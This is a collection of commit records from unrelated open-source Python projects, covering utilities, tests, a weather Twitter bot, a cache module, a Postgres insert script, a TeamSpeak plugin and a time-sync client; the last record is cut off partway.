860b7b30f393622dac9badd15d65bf59679580e2 | Create utils.py | twitterdev/twitter-for-bigquery,atomicjets/twitter-for-bigquery,atomicjets/twitter-for-bigquery,twitterdev/twitter-for-bigquery,atomicjets/twitter-for-bigquery,twitterdev/twitter-for-bigquery | image_gnip/utils.py | image_gnip/utils.py | import os
import sys
import time
import logging.config
import json
class Utils:
@staticmethod
def insert_record(client, dataset_id, table_id, record):
result = client.push_rows(dataset_id, table_id, [record], None)
if result.get('insertErrors', None):
print "Record: %s" % (json.dumps(record))
print "Error result: %s" % result
return False
return True
@staticmethod
def import_from_file(client, dataset_id, table_id, filename, single_tweet=False):
if single_tweet:
record = json.loads(Utils.read_file(SAMPLE_TWEET_FILE))
success = Utils.insert_record(client, dataset_id, table_id, record)
return success
row = 0
with open(filename, "r") as f:
for tweet in f:
record = json.loads(tweet)
# ignore delete records for now
if record.get("delete", None):
continue
record_scrubbed = Utils.scrub(record)
success = Utils.insert_record(client, dataset_id, table_id, record_scrubbed)
if not success:
print "Failed row: %s %s" % (row, json.dumps(record))
return
else:
print "Processed row: %s" % row
row = row + 1
@staticmethod
def scrub(d):
# d.iteritems isn't used as you can't del or the iterator breaks.
for key, value in d.items():
if value is None:
del d[key]
elif key == 'coordinates':
del d[key]
elif key == 'attributes': # in 'place' object
del d[key]
elif key == 'bounding_box': # in 'place' object
del d[key]
elif key == 'retweeted_status':
del d[key]
elif key == 'created_at':
d[key] = Utils.convert_timestamp(value)
elif isinstance(value, dict):
Utils.scrub(value)
return d # For convenience
@staticmethod
def convert_timestamp(str):
ts = time.strptime(str,'%a %b %d %H:%M:%S +0000 %Y')
ts = time.strftime('%Y-%m-%d %H:%M:%S', ts)
return ts
@staticmethod
def read_file(fn):
data = ""
with open(fn, "r") as f:
for line in f:
data = data + line
return data
@staticmethod
def generate_schema_from_tweet():
record_str = Utils.read_file(SAMPLE_TWEET_FILE)
record = json.loads(record_str)
schema_str = schema_from_record(record)
return schema_str
@staticmethod
def enable_logging():
LOGGING_CONFIG = os.path.join(os.path.dirname(__file__), "logging.conf")
print "LOGGING_CONFIG" + str(LOGGING_CONFIG)
logging.config.fileConfig(LOGGING_CONFIG)
root = logging.getLogger("root")
return root
| apache-2.0 | Python |
|
0080b6744b0ed9603ecf28b826e03aef01a58d2c | add editmate extension | danielballan/ipython_extensions,NunoEdgarGub1/ipython_extensions,minrk/ipython_extensions,dekstop/ipython_extensions,NunoEdgarGub1/ipython_extensions,minrk/ipython_extensions,dekstop/ipython_extensions,NunoEdgarGub1/ipython_extensions,danielballan/ipython_extensions,minrk/ipython_extensions,dekstop/ipython_extensions,danielballan/ipython_extensions | editmate.py | editmate.py | """
Use TextMate as the editor
Usage: %load_ext editmate
Now when you %edit something, it opens in textmate.
This is only necessary because the textmate command-line entrypoint
doesn't support the +L format for linenumbers, it uses `-l L`.
"""
from subprocess import Popen, list2cmdline
from IPython.core.error import TryNext
def edit_in_textmate(self, filename, linenum=None, wait=True):
cmd = ['mate']
if wait:
cmd.append('-w')
if linenum is not None:
cmd.extend(['-l', str(linenum)])
cmd.append(filename)
proc = Popen(list2cmdline(cmd), shell=True)
if wait and proc.wait() != 0:
raise TryNext()
def load_ipython_extension(ip):
ip.set_hook('editor', edit_in_textmate)
| bsd-3-clause | Python |
|
2ecf595b29b3b45769ab0934be6d095a4f80ad56 | Add mmtl unit teset | HazyResearch/metal,HazyResearch/metal | tests/metal/mmtl/test_mmtl.py | tests/metal/mmtl/test_mmtl.py | import unittest
from metal.mmtl.BERT_tasks import create_tasks
from metal.mmtl.metal_model import MetalModel
from metal.mmtl.trainer import MultitaskTrainer
class MMTLTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
task_names = [
"COLA",
"SST2",
"MNLI",
"RTE",
"WNLI",
"QQP",
"MRPC",
"STSB",
"QNLI",
]
cls.tasks = create_tasks(
task_names, max_datapoints=100, dl_kwargs={"batch_size": 8}
)
def test_mmtl_training(self):
model = MetalModel(self.tasks)
trainer = MultitaskTrainer()
trainer.train_model(
model,
self.tasks,
checkpoint_metric="train/loss",
checkpoint_metric_mode="min",
n_epochs=1,
verbose=False,
)
| apache-2.0 | Python |
|
34b1eb53ffbca24a36c103f2017b8780405c48f4 | add prod wsgi to code | USStateDept/FPA_Core,nathanhilbert/FPA_Core,USStateDept/FPA_Core,nathanhilbert/FPA_Core,USStateDept/FPA_Core,nathanhilbert/FPA_Core | find.wsgi | find.wsgi | from openspending import core
application = core.create_web_app() | agpl-3.0 | Python |
|
59de1a12d44245b69ade0d4703c98bf772681751 | Add tests for User admin_forms | incuna/django-user-management,incuna/django-user-management | user_management/models/tests/test_admin_forms.py | user_management/models/tests/test_admin_forms.py | from django.core.exceptions import ValidationError
from django.test import TestCase
from .. import admin_forms
from . factories import UserFactory
class UserCreationFormTest(TestCase):
def test_clean_email(self):
email = '[email protected]'
form = admin_forms.UserCreationForm()
form.cleaned_data = {'email': email}
self.assertEqual(form.clean_email(), email)
def test_clean_duplicate_email(self):
user = UserFactory.create()
form = admin_forms.UserCreationForm()
form.cleaned_data = {'email': user.email}
with self.assertRaises(ValidationError):
form.clean_email()
def test_clean(self):
data = {'password1': 'pass123', 'password2': 'pass123'}
form = admin_forms.UserCreationForm()
form.cleaned_data = data
self.assertEqual(form.clean(), data)
def test_clean_mismatched(self):
data = {'password1': 'pass123', 'password2': 'pass321'}
form = admin_forms.UserCreationForm()
form.cleaned_data = data
with self.assertRaises(ValidationError):
form.clean()
class UserChangeFormTest(TestCase):
def test_clean_password(self):
password = 'pass123'
data = {'password': password}
user = UserFactory.build()
form = admin_forms.UserChangeForm(data, instance=user)
self.assertNotEqual(form.clean_password(), password)
| bsd-2-clause | Python |
|
706e8a6318b50466ee00ae51f59ec7ab76f820d6 | Create forecast.py | AJBBB/Turnkey-Twitter-WeatherBot,mattyk1985/Turnkey-Twitter-WeatherBot | forecast.py | forecast.py | # -*- coding: utf-8 -*-
# Weather Twitter Bot - AJBBB - 7/8/2015 v2.*
import urllib2
import json
from birdy.twitter import UserClient
import tweepy
#Twitter Keys
CONSUMER_KEY = "YOUR CONSUMER KEY HERE"
CONSUMER_SECRET = "YOUR CONSUMER SECRET HERE"
ACCESS_TOKEN = "YOUR ACCESS TOKEN HERE"
ACCESS_TOKEN_SECRET = "YOUR ACCESS TOKEN SECRET"
#Get the wundergound json file to be read
f = urllib2.urlopen("http://api.wunderground.com/api/YOUR-WUNDERGROUND-API-KEY-HERE/geolookup/conditions/q/GB/London.json")
#read from the json file
json_string = f.read()
#parse the json file
parsed_json = json.loads(json_string)
#get info from current_observation in json file
temp_c = parsed_json['current_observation']['temp_c']
wind = parsed_json['current_observation']['wind_kph']
winddir = parsed_json['current_observation']['wind_dir']
windstr = parsed_json['current_observation']['wind_string']
weather = parsed_json['current_observation']['weather']
#Define the degree symbol
degree = u'\N{DEGREE SIGN}'
#Connect Using Tweepy
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
#oAuth Client Info
client = UserClient(CONSUMER_KEY,
CONSUMER_SECRET,
ACCESS_TOKEN,
ACCESS_TOKEN_SECRET)
def tweet(message):
#Simple tweet function to tweet whatever is passed to message.
client.api.statuses.update.post(status=message)
if wind > 0.0:
#Tweet out the current weather with numerical wind speed.
tweet("Current weather in London, UK: " + str(temp_c) +
degree + "C" + " and " + str(weather) + ". Wind: " + str(wind) +
" KPH #weather #london #news #UK http://is.gd/UyLFWz")
else:
#Tweet out the current weather with text.
tweet("Current weather in London, UK: " + str(temp_c) +
degree + "C" + " and " + str(weather) +
". Little to no wind. #weather #london #news #UK http://is.gd/UyLFWz")
| mit | Python |
|
ae1aaaddb8adbbe4167e9b2a073493df90f6fd60 | Remove unused CACHE_VERSION | hpsbranco/subliminal,neo1691/subliminal,juanmhidalgo/subliminal,Elettronik/subliminal,ofir123/subliminal,fernandog/subliminal,h3llrais3r/subliminal,SickRage/subliminal,Diaoul/subliminal | subliminal/cache.py | subliminal/cache.py | # -*- coding: utf-8 -*-
import datetime
from dogpile.cache import make_region
#: Expiration time for show caching
SHOW_EXPIRATION_TIME = datetime.timedelta(weeks=3).total_seconds()
#: Expiration time for episode caching
EPISODE_EXPIRATION_TIME = datetime.timedelta(days=3).total_seconds()
region = make_region()
| # -*- coding: utf-8 -*-
import datetime
from dogpile.cache import make_region
#: Subliminal's cache version
CACHE_VERSION = 1
#: Expiration time for show caching
SHOW_EXPIRATION_TIME = datetime.timedelta(weeks=3).total_seconds()
#: Expiration time for episode caching
EPISODE_EXPIRATION_TIME = datetime.timedelta(days=3).total_seconds()
region = make_region()
| mit | Python |
1d5227941c4839ff781fb944f425865b8afdc01f | Add lc0732_my_calendar_iii.py | bowen0701/algorithms_data_structures | lc0732_my_calendar_iii.py | lc0732_my_calendar_iii.py | """Leetcode 732. My Calendar III
Hard
URL: https://leetcode.com/problems/my-calendar-iii/
Implement a MyCalendarThree class to store your events. A new event can always be added.
Your class will have one method, book(int start, int end). Formally, this represents a
booking on the half open interval [start, end), the range of real numbers x such that
start <= x < end.
A K-booking happens when K events have some non-empty intersection (ie., there is some
time that is common to all K events.)
For each call to the method MyCalendar.book, return an integer K representing the
largest integer such that there exists a K-booking in the calendar.
Your class will be called like this:
MyCalendarThree cal = new MyCalendarThree();
MyCalendarThree.book(start, end)
Example 1:
MyCalendarThree();
MyCalendarThree.book(10, 20); // returns 1
MyCalendarThree.book(50, 60); // returns 1
MyCalendarThree.book(10, 40); // returns 2
MyCalendarThree.book(5, 15); // returns 3
MyCalendarThree.book(5, 10); // returns 3
MyCalendarThree.book(25, 55); // returns 3
Explanation:
The first two events can be booked and are disjoint, so the maximum K-booking is a 1-booking.
The third event [10, 40) intersects the first event, and the maximum K-booking is a 2-booking.
The remaining events cause the maximum K-booking to be only a 3-booking.
Note that the last event locally causes a 2-booking, but the answer is still 3 because
eg. [10, 20), [10, 40), and [5, 15) are still triple booked.
Note:
- The number of calls to MyCalendarThree.book per test case will be at most 400.
- In calls to MyCalendarThree.book(start, end), start and end are integers in the range [0, 10^9].
"""
class MyCalendarThree(object):
def __init__(self):
pass
def book(self, start, end):
"""
:type start: int
:type end: int
:rtype: int
"""
pass
def main():
pass
if __name__ == '__main__':
main()
| bsd-2-clause | Python |
|
5dc8e70bc081646fdeb37e9af1090a78e016d91b | add script inserting initial datas in selected database | Tisseo/TID,Tisseo/TID | insert_initial_datas.py | insert_initial_datas.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import psycopg2
import sys
import argparse
POSTGRESQL_connection = u"host='localhost' port=5432 user='postgres' password='postgres'"
def main():
parser = argparse.ArgumentParser(description="Script d'insertion des données initiales d'une base ENDIV.")
parser.add_argument("database", help="Spécifie le nom de la base de données")
args = parser.parse_args()
try:
connection_string = POSTGRESQL_connection
connection_string += u"dbname='{0}'".format(args.database)
connection = psycopg2.connect(connection_string)
except psycopg2.Error as e:
print u"connection à la base de données impossible {0}".format(e)
sys.exit(1)
query = ''
try:
cursor = connection.cursor()
try:
cursor.execute(open("insert_initial_data.sql", "r").read())
cursor.execute("COMMIT")
except psycopg2.Error, e:
print "error while inserting initial datas: {0}".format(e)
sys.exit(1)
finally:
if cursor:
cursor.close()
if connection:
connection.close()
print u'insertions OK'
sys.exit(0)
if __name__ == "__main__":
main()
| agpl-3.0 | Python |
|
2aa90b34951bde36696bbcb773940a6adc245f23 | Add Authenticater plugin | HWDexperte/ts3observer | plugins/Authenticater.py | plugins/Authenticater.py | from ts3observer.models import Plugin, Action
import MySQLdb
class Meta:
author_name = 'Tim Fechner'
author_email = '[email protected]'
version = '1.0'
class Config:
enable = False
interval = 5
yaml = {
'general': {
'servergroup_id': 0,
'remove_if_deleted': True,
},
'database': {
'hostname': 'localhost',
'username': '',
'password': '',
'database': '',
'table': '',
},
}
class Authenticater(Plugin):
def setup(self):
self.connection = MySQLdb.connect(
host=self.config['database']['hostname'],
user=self.config['database']['username'],
passwd=self.config['database']['password'],
db=self.config['database']['database']
)
self.cursor = self.connection.cursor(MySQLdb.cursors.DictCursor)
def run(self, clients, channels, server_info):
auth_list = self.get_authenticated_users()
for clid, client in clients.items():
if (client.unique_identifier, True) in auth_list:
if not self.already_has_group(client):
self.add_group(client)
else:
if self.already_has_group(client):
self.remove_group(client)
def get_authenticated_users(self):
self.cursor.execute('''SELECT ts3o_uid, ts3o_active FROM {}'''.format(self.config['database']['table']))
self.connection.commit()
users = self.cursor.fetchall()
return [(pair['ts3o_uid'], bool(pair['ts3o_active'])) for pair in users]
def already_has_group(self, client):
for group in client.servergroups:
if group == self.config['general']['servergroup_id']:
return True
return False
def add_group(self, client):
self._register_action(client, 'add')
def remove_group(self, client):
self._register_action(client, 'remove')
def shutdown(self):
self.connection.close()
def _register_action(self, client, atype):
Action(
'Authenticater',
ts3o.run_id,
client,
'{}_group'.format(atype),
function_kwargs = {
'servergroup_id': self.config['general']['servergroup_id'],
},
reason=atype
).register()
| mit | Python |
|
571dbf74bfc9f893d25ad7d626de800b2b3d6c73 | move load document functionality to deserializer. prepare for post/put methods | pavlov99/jsonapi,pavlov99/jsonapi | jsonapi/deserializer.py | jsonapi/deserializer.py | """ Deserializer definition."""
class DeserializerMeta(object):
pass
class Deserializer(object):
Meta = DeserializerMeta
@classmethod
def load_document(cls, document):
""" Given document get model.
:param dict document: Document
:return django.db.models.Model model: model instance
"""
pass
| mit | Python |
|
6537dc8853bb7f8d9fb93b0fb2b1c0241bb08b6b | Create client.py | suvrat-joshi/Mininet-Implementation-of-Cristian-s-Algorithm | python-scripts/client.py | python-scripts/client.py | import socket
from datetime import datetime, time
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) # create a client socket
port=9999
# get the current date-time
time1=datetime.now()
s.connect(("10.0.0.2", port)) # connect to server socket which is at address 10.0.0.2 and port 9999
tm=s.recv(1024) # this will read atmost 1024 bytes
# get the current date-time (after receiving current time from server)
time2=datetime.now()
serverTime=datetime.strptime(tm, "%Y-%m-%d %H:%M:%S.%f")
# terminate client socket
s.close()
# printing out time received from the time-server in console
print("The time got from the server is: \n")
print "Hour: %d \n" % serverTime.hour
print "Minute: %d \n" % serverTime.minute
print "Second: %d \n" % serverTime.second
print "Microsecond: %d \n" %serverTime.microsecond
# Applying Cristian`s algorithm
t1=time1.second*1000000+time1.microsecond
t2=time2.second*1000000+time2.microsecond
diff=(t2-t1)/2
# computed value of actual micro-sec time to be added to obtained server time
newMicro = serverTime.microsecond+diff
# printing out actual time in console after application of Cristian`s algorithm
print("Applying Cristian`s algorithm the actual time is: \n")
print "Hour: %d \n" % serverTime.hour
print "Minute: %d \n" % serverTime.minute
print "Second: %d \n" % serverTime.second
print "Microsecond: %d \n" % newMicro
| apache-2.0 | Python |
|
bae50495106ce5c9cb39143a58e0e73a4e823d29 | Implement DispatchLoader (metapath import hook) | joushou/dispatch,joushou/dispatch | loader.py | loader.py | from __future__ import print_function, absolute_import, unicode_literals, division
from stackable.stack import Stack
from stackable.utils import StackablePickler
from stackable.network import StackableSocket, StackablePacketAssembler
from sys import modules
from types import ModuleType
class DispatchLoader(object):
def __init__(self, ip, port):
self.stack = Stack((StackableSocket(ip=ip, port=port),
StackablePacketAssembler(),
StackablePickler()))
self.cache = {}
def get_module(self, name):
if name in self.cache:
return self.cache[name]
else:
self.stack.write({'load': name})
o = self.stack.read()
if o['module'] != None:
self.cache[name] = o['module']
return o['module']
def find_module(self, fullname, path=None):
if self.get_module(fullname) != None:
self.path = path
return self
return None
def load_module(self, name):
if name in modules:
return modules[name]
m = ModuleType(name, name)
modules[name] = m
mod = self.get_module(name)
if mod == None:
raise ImportError("No such module")
exec mod in m.__dict__
return m
| mit | Python |
|
0f79cf1d15292476f2bead6d85d15e6f0db6ebbf | Revert "Remove manage.py in the root" | LabD/wagtail-personalisation,LabD/wagtail-personalisation,LabD/wagtail-personalisation | manage.py | manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tests.sandbox.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| mit | Python |
|
77e13247b63af4dc2355bab2fdc64e2b38ec777a | Create manage.py | tnkteja/blockchained | manage.py | manage.py | #!/usr/bin/python
import argparse
from json import dump, load
from os import remove, rename, system
parser = argparse.ArgumentParser(description='This tool is Chaincode Development Manager.')
parser.add_argument("--init", action="store_true",help="Initialise the Chaincode environment")
# parser.add_argument('integers', metavar='N', type=int, nargs='+', help='an integer for the accumulator')
# parser.add_argument('--bootstrap', dest='bootstrap', action='store_const', const=sum, default=max, help='sum the integers (default: find the max)')
args = parser.parse_args()
############################### UTILS #############################
def bash(cmd):
print '\n'+'%'*32,"BASHING-BEGINS-HERE",'%'*32,'\n'
print "Command: ",cmd,'\n'
print "Output:\n"
system(cmd)
print '\n'
print '%'*32,"BASHING-ENDS-HERE",'%'*32,'\n'
####################################################################
specification_template={
"specification":{
"participants":[],
"ccis": {
"init": {
},
"invoke": {
},
"query": {
}
},
"models": {
}
},
"hashes": {
"specification":'',
"entities.go":'',
"ccis.go":''
}
}
init=False
if args.init:
name=raw_input()
author=raw_input()
with open("specification.json","w") as f:
dump(specification_template,f)
specification=None
# hashes=None
# with open("specification.json","r") as f:
# dic=load(f)
# specification=dic["specification"]
# hashes=dic["hashes"]
generate=False
if generate:
pass
struct="""\
type %s struct {
%s
}
"""
# with open("tmp_entities.go","w") as f:
# print >> f, "package main\n"
# for entity,attributes in models.items():
# print >> f, struct%(entity,'')
# for file in ["tmp_entities.go"]:
# system("gofmt "+file)
# remove(file[4:])
# rename(file,file[4:])
#setup=True
if setup:
#build=True
if build:
print "You know this is not really required, but just running for Knitty Gritty."
bash("go tool fix -r .")
#test=True
if test:
print "Starting Unittests."
bash("go test -v")
print "Generating Test Coverage reports."
bash("go tool cover -html=count.out -o test/coverage.html")
browser=''
bash(browser+" test/coverage.out")
credits=True
if credits:
print """\
##########################################################################
################ HYPERLEDGER CHAINCODE DEVLOPMENT MANAGER ################
##########################################################################
Author: Neela Krishna Teja Tadikonda
Thanks to my team for the procurement project for the support and encouragement.
*
*
*
*
*
*
*
*
*
*
*
*
*
*
Finally special thanks to itpc - Mohan (CTO) and Sai (CEO) for supporting and encouraging me with the development of this tool.
"""
| mit | Python |
|
540ab945736486ce78452750486ea73128b29d7b | Add parse_xml.py | jg1141/revealjs_with_speech,jg1141/revealjs_with_speech,jg1141/revealjs_with_speech | parse_xml.py | parse_xml.py | import sys
import os
from bs4 import BeautifulSoup
from zipfile import ZipFile
def main(argv):
root, ext = os.path.splitext(argv[1])
with ZipFile(argv[1]) as myzip:
with myzip.open("content.xml") as f:
soup = BeautifulSoup(f.read(), "lxml")
# print(soup)
notes = soup.findAll("draw:frame", {"presentation:class": "notes"})
with open("{}.script.txt".format(root), "w") as f:
for index, note in enumerate(notes):
bits = note.findAll("text:s")
for bit in bits:
note.find("text:s").replace_with(" ")
print("_Slide {}".format(index))
f.write("_Slide {}\n".format(index))
print(note.text)
f.write("{}\n".format(note.text))
if __name__ == "__main__":
main(sys.argv)
| mit | Python |
|
269b779fe560fb85ca527cdda2ebd4e5e9b3a89c | Add monkeyrunner script to common operations | Miliox/droid_emc2,Miliox/droid_emc2,Miliox/droid_emc2,Miliox/droid_emc2,Miliox/droid_emc2 | monkey/common.py | monkey/common.py | from com.android.monkeyrunner import MonkeyDevice as mkd
from com.android.monkeyrunner import MonkeyRunner as mkr
_ddmm_pkg = 'br.ufpe.emilianofirmino.ddmm'
def open_dev():
"""Estabilish a MonkeyDevice connection to android"""
return mkr.waitForConnection(1000)
def open_app(device, package, activity = '.MainActivity'):
"""Launch activity on device specified by package[, activity]"""
app = package + '/' + activity
device.startActivity(component=app)
def press_back(device):
"""Press back button on device"""
device.press('KEYCODE_BACK', mkd.DOWN_AND_UP)
def lock_screen(device):
"""Lock device"""
device.press('KEYCODE_POWER', mkd.DOWN_AND_UP)
def unlock_screen(device):
"""Unlock device"""
device.wake()
(x1, x2, y) = (768/2, 50, 1000)
device.drag((x1,y), (x2,y), duration=1.0, steps=50)
def start_ddmm(device):
"""Start DDMM Profiler"""
open_app(device, _ddmm_pkg)
mkr.sleep(2)
device.touch(20, 200, mkd.DOWN_AND_UP) # check prevent sleep
device.touch(384, 300, mkd.DOWN_AND_UP) # start ddmm
mkr.sleep(2)
press_back(device) # close app
def stop_ddmm(device):
"""Stop DDMM Profiler"""
open_app(device, _ddmm_pkg)
mkr.sleep(2)
device.touch(384, 300, mkd.DOWN_AND_UP) # stop ddmm
press_back(device) # close app
| mit | Python |
|
e0d075661677b4b02fa29d108472e80b9fbcad02 | Add quote fixture | Neetuj/softlayer-python,allmightyspiff/softlayer-python,kyubifire/softlayer-python,underscorephil/softlayer-python,briancline/softlayer-python,softlayer/softlayer-python,nanjj/softlayer-python,skraghu/softlayer-python,cloudify-cosmo/softlayer-python,iftekeriba/softlayer-python | SoftLayer/testing/fixtures/Billing_Order_Quote.py | SoftLayer/testing/fixtures/Billing_Order_Quote.py | getObject = {
'accountId': 1234,
'id': 1234,
'name': 'TestQuote1234',
'quoteKey': '1234test4321',
}
getRecalculatedOrderContainer = {
'orderContainers': [{
'presetId': '',
'prices': [{
'id': 1921
}],
'quantity': 1,
'packageId': 50,
'useHourlyPricing': '',
}],
}
| mit | Python |
|
07b6e59a5c7f581bd3e67f6ce254a8388e8b97e1 | add test | nakagami/minitds | minitds/test_minitds.py | minitds/test_minitds.py | #!/usr/bin/env python3
##############################################################################
# The MIT License (MIT)
#
# Copyright (c) 2016 Hajime Nakagami
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
##############################################################################
import unittest
import minitds
class TestMiniTds(unittest.TestCase):
host = 'localhost'
user = 'sa'
password = 'secret'
database = 'test'
def setUp(self):
self.connection = minitds.connect(
host=self.host,
user=self.user,
password=self.password,
database=self.database,
port=14333,
)
def tearDown(self):
self.connection.close()
def test_basic(self):
cur = self.connection.cursor()
cur.execute("select 1 n, @@version version")
if __name__ == "__main__":
unittest.main()
| mit | Python |
|
9b7817e4c4583ddecf2586b595bce9e2e126f4f0 | Add test for image.py | karlch/vimiv,karlch/vimiv,karlch/vimiv | tests/image_test.py | tests/image_test.py | #!/usr/bin/env python
# encoding: utf-8
from unittest import main
from vimiv_testcase import VimivTestCase
class ImageTest(VimivTestCase):
"""Image mode Test."""
@classmethod
def setUpClass(cls):
cls.init_test(cls, ["vimiv/testimages/arch_001.jpg"])
cls.image = cls.vimiv["image"]
def test_zoom_percent(self):
"""Test getting the fitting image zoom."""
# Panorama image
width = 1920
im_width = self.image.imsize[0]
perc = self.image.get_zoom_percent_to_fit()
self.assertEqual(im_width/width, perc)
def test_zooming(self):
"""Zooming of images."""
width = 1920
# Zoom in by 30 %
perc_before = self.image.zoom_percent
self.image.zoom_delta(0.3)
self.assertEqual(self.image.zoom_percent, perc_before * 1.3)
# Zoom to a size representing half the image size
self.image.zoom_to(0.5)
self.assertEqual(self.image.zoom_percent, 0.5)
pixbuf = self.image.image.get_pixbuf()
self.assertEqual(width * 0.5, pixbuf.get_width())
# Zoom by keyhandler
self.vimiv["keyhandler"].num_str = "03"
self.image.zoom_to(0)
self.assertEqual(self.image.zoom_percent, 1/3)
pixbuf = self.image.image.get_pixbuf()
self.assertEqual(width * (1/3), pixbuf.get_width())
# Zoom back to fit
self.image.zoom_to(0)
self.assertEqual(self.image.zoom_percent,
self.image.get_zoom_percent_to_fit())
pixbuf = self.image.image.get_pixbuf()
self.assertEqual(width * self.image.get_zoom_percent_to_fit(),
pixbuf.get_width())
# Unreasonable zoom
self.image.zoom_to(1000)
message = self.vimiv["statusbar"].left_label.get_text()
self.assertEqual(message, "Warning: Object cannot be zoomed (further)")
pixbuf = self.image.image.get_pixbuf()
self.assertEqual(width * self.image.get_zoom_percent_to_fit(),
pixbuf.get_width())
# Non parseable percentage
self.vimiv["keyhandler"].num_str = "vimiv"
self.image.zoom_to(0)
message = self.vimiv["statusbar"].left_label.get_text()
self.assertEqual(message, "Error: Zoom percentage not parseable")
def test_move(self):
"""Move from image to image."""
self.assertEqual(0, self.vimiv.index)
self.image.move_index()
self.assertEqual(1, self.vimiv.index)
self.image.move_index(forward=False)
self.assertEqual(0, self.vimiv.index)
self.image.move_index(delta=2)
self.assertEqual(2, self.vimiv.index)
self.image.move_pos()
self.assertEqual(len(self.vimiv.paths) - 1, self.vimiv.index)
self.image.move_pos(forward=False)
self.assertEqual(0, self.vimiv.index)
def test_toggles(self):
"""Toggle image.py settings."""
# Rescale svg
before = self.image.rescale_svg
self.image.toggle_rescale_svg()
self.assertFalse(before == self.image.rescale_svg)
self.image.toggle_rescale_svg()
self.assertTrue(before == self.image.rescale_svg)
# Overzoom
before = self.image.overzoom
self.image.toggle_overzoom()
self.assertFalse(before == self.image.overzoom)
self.image.toggle_overzoom()
self.assertTrue(before == self.image.overzoom)
# Animations should be tested in animation_test.py
def test_check_for_edit(self):
"""Check if an image was edited."""
path = self.vimiv.paths[self.vimiv.index]
self.assertEqual(0, self.image.check_for_edit(False))
self.vimiv.paths[self.vimiv.index] = "some-EDIT.jpg"
self.assertEqual(1, self.image.check_for_edit(False))
self.assertEqual(0, self.image.check_for_edit(True))
# Reset path
self.vimiv.paths[self.vimiv.index] = path
if __name__ == '__main__':
main()
| mit | Python |
|
a13ee62b02d3fe1958f2cbecd903c3e8b32562da | Add dummy test file #2 | 7pairs/kac6vote | tests/test_dummy.py | tests/test_dummy.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2017 Jun-ya HASEBA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
def test_dummy():
assert 1 + 1 == 2
| apache-2.0 | Python |
|
5d795253180ef11117ae27447fa597fa15b40734 | Add testing for graphing code | LaurEars/codegrapher | tests/test_graph.py | tests/test_graph.py | import os
from click.testing import CliRunner
from cli.script import cli
def get_graph_code():
return '''
from copy import deepcopy as dc
class StringCopier(object):
def __init__(self):
self.copied_strings = set()
def copy(self):
string1 = 'this'
string2 = dc(string1)
string1.add(string1)
return string2
class DoSomething(object):
def something(self):
copier = StringCopier()
copied_string = copier.copy()
'''
def test_produce_graph():
runner = CliRunner()
with runner.isolated_filesystem():
with open('code.py', 'w') as f:
f.write(get_graph_code())
runner.invoke(cli, ['code.py', '--output', 'code_output'])
assert 'code_output' in os.listdir(os.path.curdir)
assert 'code_output.pdf' in os.listdir(os.path.curdir)
def test_file_extension():
runner = CliRunner()
with runner.isolated_filesystem():
with open('code.py', 'w') as f:
f.write(get_graph_code())
runner.invoke(cli, ['code.py', '--output', 'code_output', '--output-format', 'png'])
assert 'code_output' in os.listdir(os.path.curdir)
assert 'code_output.png' in os.listdir(os.path.curdir)
assert 'code_output.pdf' not in os.listdir(os.path.curdir)
| mit | Python |
|
66989005b6e9443c65c082ea1c2e4386ffae1330 | Add a few basic pages tests ahead of #406 | bountysource/www.gittip.com,mccolgst/www.gittip.com,MikeFair/www.gittip.com,studio666/gratipay.com,mccolgst/www.gittip.com,mccolgst/www.gittip.com,gratipay/gratipay.com,eXcomm/gratipay.com,eXcomm/gratipay.com,studio666/gratipay.com,studio666/gratipay.com,gratipay/gratipay.com,mccolgst/www.gittip.com,MikeFair/www.gittip.com,eXcomm/gratipay.com,bountysource/www.gittip.com,eXcomm/gratipay.com,studio666/gratipay.com,bountysource/www.gittip.com,MikeFair/www.gittip.com,gratipay/gratipay.com,bountysource/www.gittip.com,gratipay/gratipay.com | tests/test_pages.py | tests/test_pages.py | from gittip.testing import serve_request, load, setup_tips
def test_homepage():
actual = serve_request('/').body
expected = "Gittip happens every Thursday."
assert expected in actual, actual
def test_profile():
with load(*setup_tips(("cheese", "puffs", 0))):
expected = "I’m grateful for tips"
actual = serve_request('/cheese/').body
assert expected in actual, actual
def test_widget():
with load(*setup_tips(("cheese", "puffs", 0))):
expected = "javascript: window.open"
actual = serve_request('/cheese/widget.html').body
assert expected in actual, actual
# These hit the network.
def test_github_proxy():
expected = "<b>lgtest</b> has not joined"
actual = serve_request('/on/github/lgtest/').body
